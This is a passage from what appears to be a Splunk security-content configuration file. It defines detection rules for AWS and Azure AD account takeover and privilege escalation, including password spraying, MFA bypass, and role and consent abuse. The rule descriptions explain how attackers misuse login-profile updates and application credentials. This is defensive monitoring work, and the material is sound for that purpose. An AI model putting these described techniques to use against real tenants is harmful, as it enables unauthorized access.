0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Successful Console Authentication From Multiple IPs - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = ConsoleLogin | bin span=5m _time | stats values(userAgent) as userAgent values(eventName) as eventName values(src_ip) as src_ip dc(src_ip) as distinct_ip_count by _time user_arn | where distinct_ip_count>1 | `aws_successful_console_authentication_from_multiple_ips_filter` [ESCU - AWS Successful Single-Factor Authentication - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a successful Console Login authentication event against an AWS IAM user for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account take over attempt that should be investigated action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a successful Console Login authentication event against an AWS IAM user for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account take over attempt that should be investigated action.escu.how_to_implement = The Splunk AWS Add-on is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = It is possible that some accounts do not have MFA enabled for the AWS account however its agaisnt the best practices of securing AWS. action.escu.creation_date = 2022-10-04 action.escu.modification_date = 2022-10-04 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Successful Single-Factor Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_name$ has successfully logged into an AWS Console without Multi-Factor Authentication from $src$ action.risk.param._risk = [{"risk_object_field": "user_name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Successful Single-Factor Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a successful Console Login authentication event against an AWS IAM user for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation or an account take over attempt that should be investigated action.notable.param.rule_title = AWS Successful Single-Factor Authentication action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName= ConsoleLogin errorCode=success "additionalEventData.MFAUsed"=No | stats count min(_time) as firstTime max(_time) as lastTime by src eventName eventSource aws_account_id errorCode additionalEventData.MFAUsed userAgent eventID awsRegion user_name userIdentity.arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_successful_single_factor_authentication_filter` [ESCU - AWS Unusual Number of Failed Authentications From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source IP failing to authenticate into the AWS Console with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an AWS environment to obtain initial access or elevate privileges. The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the bucket span time and the calculation of the upperBound field. This logic can be used for real time security monitoring as well as threat hunting exercises. While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `AWS Multiple Users Failing To Authenticate From Ip`. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source IP failing to authenticate into the AWS Console with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an AWS environment to obtain initial access or elevate privileges. The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the bucket span time and the calculation of the upperBound field. This logic can be used for real time security monitoring as well as threat hunting exercises. While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `AWS Multiple Users Failing To Authenticate From Ip`. action.escu.how_to_implement = You must install Splunk Add-on for AWS in order to ingest Cloudtrail. We recommend the users to try different combinations of the bucket span time and the calculation of the upperBound field to tune this search according to their environment action.escu.known_false_positives = No known false postives for this detection. Please review this alert action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Unusual Number of Failed Authentications From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = Unusual number of failed console login attempts against users $tried_accounts$ seen from $src_ip$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Unusual Number of Failed Authentications From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=ConsoleLogin action=failure | bucket span=10m _time | stats dc(_raw) AS distinct_attempts values(user_name) as tried_accounts by _time, src_ip | eventstats avg(distinct_attempts) as avg_attempts , stdev(distinct_attempts) as ip_std by _time | eval upperBound=(avg_attempts+ip_std*3) | eval isOutlier=if(distinct_attempts > 10 and distinct_attempts >= upperBound, 1, 0) | where isOutlier = 1 |`aws_unusual_number_of_failed_authentications_from_ip_filter` [ESCU - AWS UpdateLoginProfile - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events where a user A who has already permission to update login profile, makes an API call to update login profile for another user B . Attackers have been know to use this technique for Privilege Escalation in case new victim(user B) has more permissions than old victim(user B) action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user A who has already permission to update login profile, makes an API call to update login profile for another user B . Attackers have been know to use this technique for Privilege Escalation in case new victim(user B) has more permissions than old victim(user B) action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created keys for another user. action.escu.creation_date = 2022-03-03 action.escu.modification_date = 2022-03-03 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS UpdateLoginProfile - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = From IP address $src$, user agent $userAgent$ has trigged an event $eventName$ for updating the existing login profile, potentially giving user $user_arn$ more access privilleges action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS UpdateLoginProfile - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user A who has already permission to update login profile, makes an API call to update login profile for another user B . Attackers have been know to use this technique for Privilege Escalation in case new victim(user B) has more permissions than old victim(user B) action.notable.param.rule_title = AWS UpdateLoginProfile action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = UpdateLoginProfile userAgent !=console.amazonaws.com errorCode = success | eval match=if(match(userIdentity.userName,requestParameters.userName), 1,0) | search match=0 | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.userName src eventName eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.userName user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_updateloginprofile_filter` [ESCU - Azure Active Directory High Risk Sign-in - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them in three categories high, medium and low. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them in three categories high, medium and low. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. Specifically, this analytic leverages the RiskyUsers and UserRiskEvents log category in the azure:monitor:aad sourcetype. action.escu.known_false_positives = Details for the risk calculation algorithm used by Identity Protection are unknown and may be prone to false positives. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure Active Directory High Risk Sign-in - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = A high risk event was identified by Identify Protection for user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure Active Directory High Risk Sign-in - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them in three categories high, medium and low. action.notable.param.rule_title = Azure Active Directory High Risk Sign-in action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=UserRiskEvents properties.riskLevel=high | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip, activity, riskLevel, riskEventType, additionalInfo | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_active_directory_high_risk_sign_in_filter` [ESCU - Azure AD Admin Consent Bypassed by Service Principal - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection focuses on identifying instances in Azure Active Directory where a service principal assigns app roles without standard admin consent, using Entra ID logs. It operates on the azure_monitor_aad data source, scrutinizing the "Add app role assignment to service principal" operation, specifically from service principals. The query dissects details such as role ID, value, and description, important for understanding the nature of the roles being assigned. Monitoring this in a SOC is critical as it flags potential bypasses of vital administrative consent processes in Azure AD, which could result in unauthorized privileges being granted. A true positive detection suggests that a service principal may be exploiting automation to assign sensitive permissions without proper oversight. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection focuses on identifying instances in Azure Active Directory where a service principal assigns app roles without standard admin consent, using Entra ID logs. It operates on the azure_monitor_aad data source, scrutinizing the "Add app role assignment to service principal" operation, specifically from service principals. The query dissects details such as role ID, value, and description, important for understanding the nature of the roles being assigned. Monitoring this in a SOC is critical as it flags potential bypasses of vital administrative consent processes in Azure AD, which could result in unauthorized privileges being granted. A true positive detection suggests that a service principal may be exploiting automation to assign sensitive permissions without proper oversight. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Auditlog log category action.escu.known_false_positives = Service Principals are sometimes configured to legitimately bypass the consent process for purposes of automation. Filter as needed. action.escu.creation_date = 2024-02-09 action.escu.modification_date = 2024-02-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Admin Consent Bypassed by Service Principal - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Privilege Escalation", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = Service principal $src_user$ bypassed the admin consent process and granted permissions to $dest_user$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Admin Consent Bypassed by Service Principal - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection focuses on identifying instances in Azure Active Directory where a service principal assigns app roles without standard admin consent, using Entra ID logs. It operates on the azure_monitor_aad data source, scrutinizing the "Add app role assignment to service principal" operation, specifically from service principals. The query dissects details such as role ID, value, and description, important for understanding the nature of the roles being assigned. Monitoring this in a SOC is critical as it flags potential bypasses of vital administrative consent processes in Azure AD, which could result in unauthorized privileges being granted. A true positive detection suggests that a service principal may be exploiting automation to assign sensitive permissions without proper oversight. action.notable.param.rule_title = Azure AD Admin Consent Bypassed by Service Principal action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Add app role assignment to service principal" src_user_type=servicePrincipal | rename properties.* as * | eval roleId = mvindex('targetResources{}.modifiedProperties{}.newValue', 0) | eval roleValue = mvindex('targetResources{}.modifiedProperties{}.newValue', 1) | eval roleDescription = mvindex('targetResources{}.modifiedProperties{}.newValue', 2) | eval dest_user = mvindex('targetResources{}.id', 0) | rename initiatedBy.app.displayName as src_user | stats count earliest(_time) as firstTime latest(_time) as lastTime by src_user dest_user roleId roleValue roleDescription | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_admin_consent_bypassed_by_service_principal_filter` [ESCU - Azure AD Application Administrator Role Assigned - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. This role also grants the ability to manage application credentials. Users assigned this role can add credentials to an application, and use those credentials to impersonate the applications identity. If the applications identity has been granted access to a resource, such as the ability to create or update User or other objects, then a user assigned to this role could perform those actions while impersonating the application. This ability to impersonate the applications identity may be an elevation of privilege over what the user can do via their role assignments. Red teams and adversaries alike may abuse this role to escalate their privileges in an Azure AD tenant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. This role also grants the ability to manage application credentials. Users assigned this role can add credentials to an application, and use those credentials to impersonate the applications identity. If the applications identity has been granted access to a resource, such as the ability to create or update User or other objects, then a user assigned to this role could perform those actions while impersonating the application. This ability to impersonate the applications identity may be an elevation of privilege over what the user can do via their role assignments. Red teams and adversaries alike may abuse this role to escalate their privileges in an Azure AD tenant. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Auditlog log category action.escu.known_false_positives = Administrators may legitimately assign the Application Administrator role to a user. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Application Administrator Role Assigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = The privileged Azure AD role Application Administrator was assigned for User $user$ initiated by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Application Administrator Role Assigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the assignment of the Application Administrator role to an Azure AD user. Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. This role also grants the ability to manage application credentials. Users assigned this role can add credentials to an application, and use those credentials to impersonate the applications identity. If the applications identity has been granted access to a resource, such as the ability to create or update User or other objects, then a user assigned to this role could perform those actions while impersonating the application. This ability to impersonate the applications identity may be an elevation of privilege over what the user can do via their role assignments. Red teams and adversaries alike may abuse this role to escalate their privileges in an Azure AD tenant. action.notable.param.rule_title = Azure AD Application Administrator Role Assigned action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` "operationName"="Add member to role" "properties.targetResources{}.modifiedProperties{}.newValue"="\"Application Administrator\"" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime by user initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_application_administrator_role_assigned_filter` [ESCU - Azure AD Authentication Failed During MFA Challenge - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category. action.escu.known_false_positives = Legitimate users may miss to reply the MFA challenge within the time window or deny it by mistake. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Authentication Failed During MFA Challenge - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ failed to pass MFA challenge action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Authentication Failed During MFA Challenge - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.notable.param.rule_title = Azure AD Authentication Failed During MFA Challenge action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | stats count min(_time) as firstTime max(_time) as lastTime by user, src_ip, status.additionalDetails, appDisplayName, user_agent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_authentication_failed_during_mfa_challenge_filter` [ESCU - Azure AD Block User Consent For Risky Apps Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic detects when the risk-based step-up consent security setting in Azure AD is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative step-up for consent instead. Disabling this feature could expose the organization to OAuth phishing threats.The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Risk"] action.escu.eli5 = This analytic detects when the risk-based step-up consent security setting in Azure AD is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative step-up for consent instead. Disabling this feature could expose the organization to OAuth phishing threats.The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = Legitimate changes to the 'risk-based step-up consent' setting by administrators, perhaps as part of a policy update or security assessment, may trigger this alert, necessitating verification of the change's intent and authorization action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD Block User Consent For Risky Apps Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ disabled the BlockUserConsentForRiskyApps Azure AD setting. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD Block User Consent For Risky Apps Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects when the risk-based step-up consent security setting in Azure AD is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative step-up for consent instead. Disabling this feature could expose the organization to OAuth phishing threats.The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization action.notable.param.rule_title = Azure AD Block User Consent For Risky Apps Disabled action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Update authorization policy" | rename properties.* as * | eval index_number = if(mvfind('targetResources{}.modifiedProperties{}.displayName', "AllowUserConsentForRiskyApps") >= 0, 